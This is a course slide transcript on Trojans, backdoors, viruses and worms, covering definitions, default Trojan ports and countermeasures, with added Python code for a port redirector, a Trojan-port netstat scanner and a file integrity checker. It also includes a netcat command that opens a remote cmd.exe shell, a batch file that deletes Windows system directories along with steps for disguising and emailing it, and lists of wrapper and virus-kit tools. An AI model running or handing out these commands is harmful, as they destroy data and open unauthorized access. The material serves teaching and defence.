
Chapter 5


yahto

Presentation Transcript


1. Chapter 5: Trojans, Backdoors, Rootkits, Viruses, and Worms

2. Definitions
• Trojan: a program that hides malicious code inside something that looks benign
• Backdoor: a way of accessing a computer without the security and authentication procedures that are normally required
• Rootkit: modifies the OS (kernel, drivers or system libraries) to conceal malicious programs while they run
• Virus: self-replicating code that attaches copies of itself to other executable code; it needs a host file, and usually a user action, to spread
• Worm: self-contained code that infects local and remote machines and spreads automatically over the network

3. Some overlap
• Example: the Melissa "virus" (1999)
• Trojan: arrived as an e-mail attachment that masqueraded as a harmless Word document
• Virus: infected Word documents (through the Normal template) when they were opened
• Worm: used Outlook to mail itself to the first 50 entries in the user's personal address book

4. Trojans and Backdoors
• Trojan:
  • A malicious program disguised as something benign
  • Often delivered as part of a "wrapper" process that binds it to a legitimate program
• Examples (default control ports):
  • Back Orifice: 31337 or 31338, from the "Cult of the Dead Cow"
  • NetBus: 12345, 12346, 20034
  • Whack-a-mole: 12361 or 12362
• Delivered via:
  • NetBIOS remote install
  • Fake executables
  • ActiveX controls, VBScript, JavaScript
  • Spyware / Adware bundles

5. Trojans and Backdoors
• Backdoor:
  • Allows access to the system while bypassing normal authentication
  • Often delivered via a Trojan
  • May install a new service, or hijack an unused existing service
  • Remote Access Trojan (RAT): a backdoor with a remote-control interface for the attacker

6. Overt & Covert Channels
• Overt channel: a program's normal, legitimate communication path
• Covert channel: a path not intended for communication, used to move data in an unexpected way
• Tunneling (carrying the Trojan's traffic inside a protocol the network already allows) is a good way for Trojans to bypass an IDS
• Port redirectors: forward traffic arriving on one port to another host and port, so a backdoor can be reached through a port the firewall permits
  • Datapipe (Linux)
  • Fpipe (Windows)
• Port-to-process mapping
  • Fport: identify unknown open ports and the applications that own them
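The port-redirector idea on slide 6 in working form, as an added example that is not code from the slides or from datapipe/fpipe: every connection accepted on a listening port is spliced to a target host and port, so a service sitting on an unusual port can be reached through a port that is allowed. The echo server is a constructed stand-in for the redirected service, and all addresses are loopback so the example runs offline.

```python
"""Minimal TCP port redirector (the datapipe/fpipe idea) with a constructed
echo service to redirect to. Added example; assumes only the standard library."""
import socket
import threading


def _pump(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes src -> dst until src closes, then half-close dst."""
    try:
        while True:
            data = src.recv(4096)
            if not data:
                break
            dst.sendall(data)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def splice(client: socket.socket, target: tuple) -> None:
    """Connect to target and relay both directions until both sides close."""
    upstream = socket.create_connection(target, timeout=5)
    upstream.settimeout(None)
    a = threading.Thread(target=_pump, args=(client, upstream), daemon=True)
    b = threading.Thread(target=_pump, args=(upstream, client), daemon=True)
    a.start()
    b.start()
    a.join()
    b.join()
    client.close()
    upstream.close()


def start_redirector(listen_host: str, listen_port: int, target: tuple) -> int:
    """Listen on listen_host:listen_port and redirect each connection to target
    in a background thread. Port 0 picks a free port; the bound port is returned."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((listen_host, listen_port))
    srv.listen(5)

    def accept_loop() -> None:
        while True:
            client, _ = srv.accept()
            threading.Thread(target=splice, args=(client, target), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv.getsockname()[1]


def start_echo_server(host: str = "127.0.0.1") -> int:
    """Constructed stand-in for the 'hidden' service: echoes whatever it receives."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)

    def loop() -> None:
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()

    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]


def round_trip(port: int, payload: bytes) -> bytes:
    """Send payload to 127.0.0.1:port, half-close, and return the full reply."""
    with socket.create_connection(("127.0.0.1", port), timeout=5) as s:
        s.sendall(payload)
        s.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = s.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    hidden = start_echo_server()
    front = start_redirector("127.0.0.1", 0, ("127.0.0.1", hidden))
    print(round_trip(front, b"hello through the pipe"))
```

From the client's point of view the echo service now lives on the redirector's port; the only trace of the real port is the second, outbound connection, which is exactly what a host-based tool such as Fport (or netstat's foreign-address column) is for.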

7. Types of Trojans
• Remote Access Trojans (RATs): give the attacker remote control of the machine
• Data-Sending Trojans: collect passwords and other confidential data and send them out, e.g. eBlaster
• Destructive Trojans: destroy files or the OS
• DoS Trojans: use the victim to launch denial-of-service attacks
• Proxy Trojans: turn the victim into a proxy so the attacker's real address stays hidden
• FTP Trojans: run an FTP server on the victim (port 21) that the attacker connects to
• Security Software Disabler Trojans: kill antivirus and firewall software, e.g. FireKiller 2000

8. Reverse Connecting Trojans
• The victim opens an outbound connection to the attacker, so an external attacker reaches internal systems through firewalls that only block inbound traffic; the classic listening backdoors below need an inbound path instead
• QAZ: 7597; renames Notepad.exe to Note.com and installs itself as Notepad.exe
• Tini: 7777; Windows backdoor Trojan that gives a command prompt to anyone who connects
• Donald Dick: 23476 or 23477
• NetBus: 12345, 12346, 20034
• Netcat: can serve a command shell to a remote telnet session
  • Sample command: nc -L -p 5000 -t -e cmd.exe (listen on TCP 5000, re-listen after each disconnect, answer telnet negotiation, hand the connection to cmd.exe)
• SubSeven
• Back Orifice 2000: 31337
• FireKiller 2000

9. Symptoms of Trojans
• Programs auto-starting and running by themselves
• Screen flips
• Sudden reduction in system resources
• Corrupt or missing files
• CD-ROM drawer opens and closes
• Wallpaper, background, etc. change
• Unexpected or suspicious web sites open
• Mouse moves by itself or the pointer disappears
• Taskbar disappears
• Task Manager is disabled

10. Scanning for Trojans
• Run netstat -an and compare the listening ports against the default ports of known Trojans (a match is a lead, not proof: most of these tools let the attacker change the port)

Trojan                    Protocol   Ports
Back Orifice              UDP        31337, 31338
Deep Throat               UDP        2140, 3150
NetBus                    TCP        12345, 12346
Whack-a-Mole              TCP        12361, 12362
NetBus 2                  TCP        20034
GirlFriend                TCP        21544
Sockets de Troie          TCP        5000, 5001, 50505
Masters Paradise          TCP        3129, 40421, 40422, 40423, 40426

11. Scanning for Trojans (continued)

Trojan                    Protocol   Ports
Devil                     TCP        65000
Evil                      TCP        23456
Doly Trojan               TCP        1011, 1012, 1015
Chargen                   UDP        9, 19
Stealth Spy Phaze         TCP        555
NetBIOS datagram          TCP, UDP   138
SubSeven                  TCP        6711, 6712, 6713
ICQ Trojan                TCP        1033
MStream                   UDP        9325

12. Scanning for Trojans (continued)

Trojan                    Protocol   Ports
The Prayer 1.0 - 2.0      TCP        9999
Online KeyLogger          UDP        49301
Portal of Doom            TCP, UDP   10067, 10167
Senna Spy                 TCP        13000
Trojan Cow                TCP        2001
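The netstat comparison from slides 10 to 12 automated, as an added example that is not code from the slides: the port table is loaded from the list above, a constructed Windows-style `netstat -an` listing stands in for real output, and only sockets that are actually waiting for connections (TCP LISTENING, or a bound UDP socket) are flagged, so an outbound connection whose local ephemeral port happens to collide with the table is not reported. The sample listing and the host names in it are made up.

```python
"""Match `netstat -an` output against the Trojan port table from the slides.
Added example; the NETSTAT_SAMPLE text is constructed, not captured."""
from typing import Dict, List, Tuple

# (protocol, port) -> Trojan name, transcribed from the table on slides 10-12
TROJAN_PORTS: Dict[Tuple[str, int], str] = {}


def _add(name: str, proto: str, *ports: int) -> None:
    for p in ports:
        TROJAN_PORTS[(proto, p)] = name


_add("Back Orifice", "UDP", 31337, 31338)
_add("Deep Throat", "UDP", 2140, 3150)
_add("NetBus", "TCP", 12345, 12346)
_add("Whack-a-Mole", "TCP", 12361, 12362)
_add("NetBus 2", "TCP", 20034)
_add("GirlFriend", "TCP", 21544)
_add("Sockets de Troie", "TCP", 5000, 5001, 50505)
_add("Masters Paradise", "TCP", 3129, 40421, 40422, 40423, 40426)
_add("Devil", "TCP", 65000)
_add("Evil", "TCP", 23456)
_add("Doly Trojan", "TCP", 1011, 1012, 1015)
_add("SubSeven", "TCP", 6711, 6712, 6713)
_add("ICQ Trojan", "TCP", 1033)
_add("MStream", "UDP", 9325)
_add("The Prayer", "TCP", 9999)
_add("Online KeyLogger", "UDP", 49301)
_add("Portal of Doom", "TCP", 10067, 10167)
_add("Portal of Doom", "UDP", 10067, 10167)
_add("Senna Spy", "TCP", 13000)
_add("Trojan Cow", "TCP", 2001)

# Constructed sample in the shape of Windows `netstat -an` output: a host with a
# NetBus listener, a Back Orifice UDP socket, and a harmless outbound HTTP
# connection whose local port (1033) collides with the ICQ Trojan entry.
NETSTAT_SAMPLE = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:12345          0.0.0.0:0              LISTENING
  TCP    192.168.1.10:12345     192.168.1.77:4120      ESTABLISHED
  TCP    192.168.1.10:1033      10.0.0.5:80            ESTABLISHED
  UDP    0.0.0.0:31337          *:*
  UDP    0.0.0.0:137            *:*
"""


def parse_netstat(text: str) -> List[Tuple[str, int, str]]:
    """Return (proto, local_port, state) per socket line. UDP lines carry no
    state column, so they are reported as BOUND."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP", "TCPv6", "UDPv6"):
            continue
        proto = parts[0][:3]
        # rsplit on the last colon handles both "0.0.0.0:135" and "[::]:135"
        port = int(parts[1].rsplit(":", 1)[1])
        state = parts[3] if len(parts) > 3 else "BOUND"
        rows.append((proto, port, state))
    return rows


def find_trojan_listeners(text: str) -> List[Tuple[str, int, str]]:
    """Flag sockets waiting for connections on a known Trojan port.
    Established connections are skipped: only a listener is evidence of a
    backdoor waiting for its operator."""
    hits = []
    for proto, port, state in parse_netstat(text):
        if state not in ("LISTENING", "BOUND"):
            continue
        name = TROJAN_PORTS.get((proto, port))
        if name:
            hits.append((proto, port, name))
    return hits


if __name__ == "__main__":
    for proto, port, name in find_trojan_listeners(NETSTAT_SAMPLE):
        print(f"{proto} {port}: default port of {name}")
```

On a live host, feed the real output in with `find_trojan_listeners(subprocess.check_output(["netstat", "-an"], text=True))` and then use Fport (or `netstat -ano` plus Task Manager on newer Windows) to see which process owns each flagged port; the port match alone only tells you where to look.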

13. Netcat
• Features: firewall testing, port scanning, creating a backdoor, identifying services (banner grabbing)
• Command-line tool that opens TCP and UDP connections and ties them to stdin/stdout
• -d: detach from the console and run in the background (Windows build)
• -l -p [port]: listen on the given port instead of connecting out
• -z: zero-I/O mode, used for port scanning (report whether a port is open without sending data)
• -v: verbose mode
• -e [program]: execute the program once a connection is made, with its stdin/stdout wired to the socket; this is what turns nc into a backdoor, and many current Linux builds are compiled without it
• -L: like -l, but re-listen after the connection drops (Windows build only)
• -u: use UDP instead of TCP

14. Wrappers (Glueware)
• Three things needed:
  • A legitimate program
  • The Trojan program
  • A wrapper program that bundles the two into a single executable
• The result runs the legitimate program visibly while the Trojan installs in the background
• Wrapper tools: Trojan Man, Yet Another Binder, Predator Wrapper, Graffiti, EXE Maker, Restorator

15. Trojan Countermeasures
• Spyware and malware detectors: Malwarebytes, Norton Internet Security
• Fport: map every open port to the process that owns it
• Tripwire: check file signatures, sizes and integrity against a trusted baseline
• Dsniff: a collection of network sniffing and auditing tools, useful for seeing a Trojan's traffic on the wire
• Windows built-in commands:
  • Sigverif: lists system files and drivers that are not digitally signed
  • SFC (System File Checker): sfc /scannow verifies protected system files and restores altered ones
• "What's Running" or "What's on My Computer?" to inspect running processes
• Be wary of free "cleaning" applications; many are Trojans themselves

16. Viruses and Worms
• International Computer Security Association (ICSA) Labs: tests and certifies AV software
• Virus: infects another file and spreads when that file is run or opened; often lives inside document files such as Word or Excel (macro viruses)
• Worm: does not need a carrier program; it is self-contained and spreads over the network by itself
• Examples: Nimda, ILOVEYOU

17. Virus Types
• Polymorphic: changes its signature on each infection to avoid detection, e.g. Virut (cleanup usually requires a reformat)
• Stealth: hides the infection by intercepting reads of infected files or sectors
• File: infects files that can be loaded or executed (.exe, .com, .bin, .sys)
• Armored: uses encryption and anti-debugging tricks to make analysis hard
• Boot Sector: infects the boot sector or master boot record so it runs before the OS loads
• System Sector: infects the executable code in the disk's system sectors
• Program: infects .BIN, .COM, .EXE and .SYS files (another name for file viruses)

18. Virus Types
• Macro: written in an application's macro language and runs when a document is opened or a particular action is triggered, e.g. in Excel
• Tunneling: gets underneath the antivirus software's interrupt hooks so the scanner never sees it
• Multipartite: infects multiple targets, e.g. both files and boot sectors
• Dual Payload: e.g. Chernobyl (CIH): overwrites the first MB of the hard disk with zeros and overwrites the flash BIOS with garbage
• Network: runs code on remote systems
• Source Code: not common; very hard to write because of the variety of compilers and languages

19. Writing a "Virus"
• Example (strictly this is a destructive Trojan, not a virus: it carries a payload but does not replicate):
• Batch file called Game.bat:
  @echo off
  del c:\windows\system32\*.*
  del c:\windows\*.*
• Convert Game.bat to Game.com with the 'bat2com' utility
• Assign an icon with the Windows file properties screen
• Send as an email attachment

20. Virus Construction Kits
• Kefi's HTML Virus Construction Kit
• Virus Creation Laboratory v1.0
• The Smeg Virus Construction Kit
• Rajaat's Tiny Flexible Mutator v1.1
• Windows Virus Creation Kit v1.00

21. Detecting Viruses & Worms
• Scan with an UP TO DATE scanner
• Use a sheep-dip machine (an isolated computer used only to scan incoming media and downloads) or a product such as SocketShield
• Isolate one computer from the network and run downloaded software there first
• Integrity checking
  • Tripwire, with MD5 (or a stronger hash) digests of every monitored file
  • Downside: a change is reported, but the checker cannot tell a change made by a virus from one made by a legitimate update or a bug
• Testing antivirus software
  • EICAR test file (EICAR.com): a harmless file that every scanner should flag; it contains exactly this 68-character string:
  X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
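The integrity checking described on slides 15 and 21 in working form, as an added example that is not code from the slides or from Tripwire: a baseline of size and digest per file is built, the tree is re-walked later, and every file that was modified, added or removed is reported. SHA-256 is used instead of the MD5 the slide mentions, because MD5 collisions let a deliberate modifier keep the old digest; the choice of SHA-256 and the `demo()` scenario (a fake Windows tree in a temporary directory, with an append-style infection, a same-size in-place patch, a dropped backdoor and a deleted file) are this example's assumptions.

```python
"""Tripwire-style file integrity baseline and check. Added example; assumes
only the standard library and uses SHA-256 rather than MD5."""
import hashlib
import os
import tempfile
from typing import Dict, List, Tuple

Baseline = Dict[str, Tuple[int, str]]  # relative path -> (size, sha256 hex)


def hash_file(path: str) -> str:
    """SHA-256 of a file, streamed so large binaries do not need to fit in RAM."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> Baseline:
    """Walk root and record size plus digest for every regular file."""
    baseline: Baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            rel = os.path.relpath(full, root)
            baseline[rel] = (os.path.getsize(full), hash_file(full))
    return baseline


def check_integrity(root: str, baseline: Baseline) -> Dict[str, List[str]]:
    """Compare the tree under root with a stored baseline.

    A virus that appends itself to an executable changes both size and hash;
    one that patches in place and pads to the original length only changes the
    hash, which is why the slide's 'size' check is not enough on its own.
    As the slide warns, the report cannot say *why* a file changed."""
    current = build_baseline(root)
    report: Dict[str, List[str]] = {"modified": [], "added": [], "removed": []}
    for rel, sig in baseline.items():
        if rel not in current:
            report["removed"].append(rel)
        elif current[rel] != sig:
            report["modified"].append(rel)
    for rel in current:
        if rel not in baseline:
            report["added"].append(rel)
    for key in report:
        report[key].sort()
    return report


def demo() -> Dict[str, List[str]]:
    """Constructed scenario: baseline a fake system tree, 'infect' it, re-check."""
    root = tempfile.mkdtemp(prefix="integrity-demo-")
    os.makedirs(os.path.join(root, "system32"))
    files = {
        "notepad.exe": b"MZ original notepad\n",
        "system32/kernel.dll": b"MZ original kernel\n",
        "readme.txt": b"hello\n",
    }
    for rel, data in files.items():
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    baseline = build_baseline(root)

    # Append-style infection: size and hash change.
    with open(os.path.join(root, "notepad.exe"), "ab") as f:
        f.write(b"<viral payload>")
    # Same-size in-place patch: only the hash changes.
    with open(os.path.join(root, "system32/kernel.dll"), "r+b") as f:
        f.seek(3)
        f.write(b"patched ")
    # Dropped backdoor and a deleted file.
    with open(os.path.join(root, "system32/note.com"), "wb") as f:
        f.write(b"backdoor")
    os.remove(os.path.join(root, "readme.txt"))
    return check_integrity(root, baseline)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

In real use the baseline must be stored (and ideally signed) off the monitored host, and taken from a known-clean state; a baseline built after infection simply enshrines the infected files as normal.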
